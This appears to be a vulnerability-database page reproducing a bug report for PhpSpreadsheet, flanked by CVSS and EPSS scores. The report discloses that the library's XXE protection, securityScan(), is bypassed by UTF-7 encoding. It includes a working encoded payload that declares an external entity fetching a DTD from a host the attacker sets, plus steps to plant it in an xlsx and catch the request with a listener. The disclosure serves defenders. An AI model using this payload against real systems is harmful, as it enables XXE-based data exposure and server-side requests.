CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
88.8%
This is: - [X] a bug report - [ ] a feature request - [ ] not a usage question (ask them on https://stackoverflow.com/questions/tagged/phpspreadsheet or https://gitter.im/PHPOffice/PhpSpreadsheet) What is the expected behavior? The securityScan() function is used to prevent XXE attacks. What is the current behavior? The securityScan() function can be bypassed by using UTF-7 encoding. What are the steps to reproduce? /Details suppressed until after patch was released/ Replace the IP address and port 127.0.0.1:8080 with something you control. +ADwAIQ-DOCTYPE xmlrootname +AFsAPAAh-ENTITY +ACU aaa SYSTEM +ACI-http://127.0.0.1:8080/ext. dtd+ACIAPgAl-aaa+ADsAJQ-ccc+ADsAJQ-ddd+ADsAXQA+ sheet1.xml Replace sheet1.xml in your xlsx file with the one above and re-zip the excel sheet. I’ve attached an xlsx file that makes a request as configured above. File exploit-localhost.xlsx Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library. Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue. Which versions of PhpSpreadsheet and PHP are affected? I believe it affects all versions. The text was updated successfully, but these errors were encountered: 👍 7 ATouhou, MrHaroldA, malouf-erfan, NinoSkopac, kevin-valerio, adrienbrignon, and artfulrobot reacted with thumbs up emoji All reactions 👍 7 reactions
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
88.8%